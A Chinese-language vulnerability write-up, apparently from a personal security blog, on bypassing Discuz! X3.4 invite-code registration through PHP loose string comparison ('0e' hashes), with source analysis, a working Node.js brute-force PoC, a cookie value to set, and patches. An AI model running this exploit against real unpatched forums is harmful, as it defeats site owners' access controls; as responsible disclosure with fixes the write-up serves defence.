Discuz! X 3.4 用 20 万个请求,永久绕过注册邀请码

本文由 Coxxs 原创,转载请注明原文链接:https://coxxs.me/528

2017-8-11 此漏洞修复方案已提交至 Discuz! 官方

2017-8-21 官方修复此问题,并发布 Discuz! X3.4 Release 20170820

背景

在 Discuz! X 发布前,Discuz! 就有邀请注册功能。管理员可以通过开启邀请注册,让游客需要邀请码注册。根据论坛运营的性质,游客需要通过他人邀请,或者通过购买等获取邀请码。

分析过程

管理“专用”的批量邀请链接

在 Discuz! X 系列中,为了方便论坛的运营,Discuz! 加入了一种批量邀请链接。管理员可以发布这个链接,让无限用户不限次数的注册:

这个链接的显示条件是:1. 论坛开启了邀请注册功能 2.登录用户对应的用户组有邀请权限 3.该用户组购买邀请码的价格是 0

需要指出的是,论坛中的所有用户都有这个链接,只是不符合上述条件,这个链接不会在前台显示。

home.php?mod=invite&u=1&c=7854219ad4fd3d1b

观察链接,主要有 u 和 c 两个参数,其中 u 是邀请者的 uid,c 是用于校验 u 的“签名”。换句话说,如果 c 的生成算法/验证方式有漏洞,相当于可以获取任意 uid 的邀请链接权限,我们先来看看 c 的生成算法

生成算法

文件: source/include/spacecp/spacecp_invite.php

function getinviteurl($inviteid, $invitecode, $appid) {
  global $_G;

  if($inviteid && $invitecode) {
    $inviteurl = getsiteurl()."home.php?mod=invite&id={$inviteid}&c={$invitecode}";
  } else { // 批量邀请链接走的这个逻辑
    // space_key 就是 c 的生成函数。注意这里的 $appid 用不到,传值为空
    $invite_code = space_key($_G['uid'], $appid);
    $inviteapp = $appid?"&app=$appid":'';
    $inviteurl = getsiteurl()."home.php?mod=invite&u=$_G[uid]&c=$invite_code{$inviteapp}";
  }
  return $inviteurl;
}

文件: source/function/function_core.php

function space_key($uid, $appid=0) {
  global $_G;
  return substr(md5($_G['setting']['siteuniqueid'].'|'.$uid.(empty($appid)?'':'|'.$appid)), 8, 16);
}

其中 $appid 默认为 0,即 c 就是 md5($siteuniqueid.'|'.$uid)的中间 16 个字符。

也就是说,只要有 siteuniqueid,就可以生成出任意 $uid 的 c 签名。站点的 siteuniqueid 怎么获得?嗯,看了一下 Discuz 代码,得出的答案是:一般获取不到。接下来看看 c 的验证方式

注意:Discuz! 应用中心的部分应用在安装中会上报 siteuniqueid,这些应用的开发者或许就知道该站点的 siteuniqueid。这是一个小安全漏洞,但不是本文的主题。

验证方式

1. 邀请引导页

邀请引导页即我们上面提到的 home.php?mod=invite&u=****&c=****

文件: source/module/home/home_invite.php

} elseif ($uid) {

  $id = 0;
  // 生成用于比对的 $invite_code (签名)
  $invite_code = space_key($uid, $appid);
  // [1] 将用户提交的 c 签名与 $invite_code 进行比较
  if($_GET['c'] != $invite_code) {
    showmessage('invite_code_error', '', array(), array('return' => true));
  }
  $inviteuser = getuserbyuid($uid);
  loadcache('usergroup_'.$inviteuser['groupid']);
  // [2] 邀请者 uid 所在的用户组的邀请码购买价格为 0
  if(!empty($_G['cache']['usergroup_'.$inviteuser['groupid']]) && $_G['cache']['usergroup_'.$inviteuser['groupid']]['inviteprice']) {
    showmessage('invite_code_error', '', array(), array('return' => true));
  }
  // 通过以上 [1] [2] 两个判断后,设置 cookies
  $cookievar = "$uid,$invite_code,$appid";
}

看似两处判断都很合理,没有问题。其实 [1] 处的判断是有漏洞的。

  1. 使用普通的逻辑符号进行比较,有时序攻击(Timing attack)漏洞
  2. 使用不等于(!=),而不是不全等(!==)进行比较,有字符串比较漏洞。

其中字符串比较漏洞的利用较简单,这里我们讨论看看。

在 php 中执行 var_dump("0" == "0e12345678901234"),结果是 true。这是因为 php 将后者当作科学计数法来解析,解析结果是 0 (0 * 10 ^ 12345678901234 = 0)。因此比较结果为 true。

c 的值是可控的,如此一来,我们只需让 space_key 生成出一个形如 0e12345678901234 的字符串即可绕过 [1] 处的判断,有办法做到吗?

回到上面的生成算法,space_key 是 md5($siteuniqueid.'|'.$uid)的中间 16 个字符,而 md5 的 hex 结果恰恰是在 [0-9a-f] 之间,也就是完全有可能生成符合规则的漏洞字符串。有多大的几率呢?

(1/16)^2 * (10/16)^14 = 0.00054210%

换句话说,大约每生成 20 万次,就能出现一个 0e[0-9]{14} 形式的字符串,用以绕过这个判断。20 万个 http 请求在实践中是可行的。

因为这个页面只是生成一串用户可控的 cookies 用于注册页面:$uid,$invite_code,$appid,我们不讨论 [2] 的判断(条件有些复杂),直接看注册页面的邀请链接验证代码。

2. 注册页面

文件:source/function/function_member.php

function getinvite() {
...
  // 接收到 cookies,进入条件判断
  } elseif($cookiecount == 3) {
    $uid = intval($cookies[0]);
    $code = trim($cookies[1]);
    $appid = intval($cookies[2]);

    $invite_code = space_key($uid, $appid);
    // [1] 跟上面一模一样的判断方式,依然可以绕过
    if($code == $invite_code) {
      $inviteprice = 0;
      $member = getuserbyuid($uid);
      // 这里假设这个 $uid 对应的用户不存在,那取出来的结果为 false, 不进入下面的判断
      if($member) {
        $usergroup = C::t('common_usergroup')->fetch($member['groupid']);
        $inviteprice = $usergroup['inviteprice'];
      }
      // $inviteprice 为 0,不进入下面的判断
      if($inviteprice > 0) return array();
      // 成功将提交的 $uid 设置进变量 ^_^
      $result['uid'] = $uid;
      $result['appid'] = $appid;
    }
  }
  // 通过验证
  if($result['uid']) {
    $member = getuserbyuid($result['uid']);
    $result['username'] = $member['username'];
  } else {
    dsetcookie('invite_auth', '');
  }
  // 返回“邀请码有效”的结果,允许注册 ^_^
  return $result;
}

注册页面只要过了 [1] 处的判断,并传入一个不存在的、并且能生成出指定格式的签名的邀请者 $uid,此后的校验畅通无阻,直接返回邀请码有效。

至此,只需通过 20 万个请求爆破出一个可生成出特殊格式 space_key 的 uid,即可通过该 uid 和为 “0” 的 c 签名,绕过邀请码无限注册用户。

PoC

const fetch = require('node-fetch')

;(async function () {
    let start = 1
    let max = 500000
    for (let i = start; i <= max; i++) {
        ;(async function (i) {
            if (await test(i)) {
                console.log('※found! uid: ' + i)
            }
        })(i)
        await sleep(20)
        if (i % 200 === 0) {
            console.log('current: ' + i + '/' + max)
        }
    }
})()

async function test(uid) {
    let res = await fetch('http://localhost/dz/home.php?mod=invite&u=' + uid + '&c=0')
    let text = await res.text()
    return !!text.match('bm_h mt') ||      // 成功进入邀请注册页面,直接注册
           !!text.match('用户空间不存在')   // 成功绕过 c 签名判断,虽然 uid 不存在,依然可以设置 cookies,直接在注册页面注册
}

function sleep(ms) {
  return new Promise(resolve => setTimeout(resolve, ms))
}

设置一下 Cookies: Edb6_2132_invite_auth=194077,0,0

修复

1. siteuniqueid 易被插件开发者获得,一旦拥有 siteuniqueid,无需爆破即可直接生成邀请链接。建议修改使用 authkey 生成。

文件: source/function/function_core.php

查找

return substr(md5($_G['setting']['siteuniqueid'].'|'.$uid.(empty($appid)?'':'|'.$appid)), 8, 16);

替换为

return substr(md5($_G['config']['security']['authkey'].'|DZXINVITE|'.$uid.(empty($appid)?'':'|'.$appid)), 8, 16);

2. 将(不)等于比较改为防止时序攻击的(不)全等比较函数

文件: source/module/home/home_invite.php

查找

if($_GET['c'] != $invite_code) {

替换为

if(!hash_equals($_GET['c'], $invite_code)) {

文件: source/function/function_member.php

查找

if($code == $invite_code) {

替换为

if(hash_equals($code, $invite_code)) {

注意:hash_equals 函数只支持 PHP >= 5.6.0,旧版 PHP 需自行实现该函数。

3. 对于不存在的邀请者 uid,不允许注册。

4. 对于没有邀请权限的邀请者(目前只判断邀请码价格是否为 0),不允许注册。

修复 1、2 后,问题 3、4 影响不大。修复方式略。

 

发表评论

电子邮件地址不会被公开。 必填项已用*标注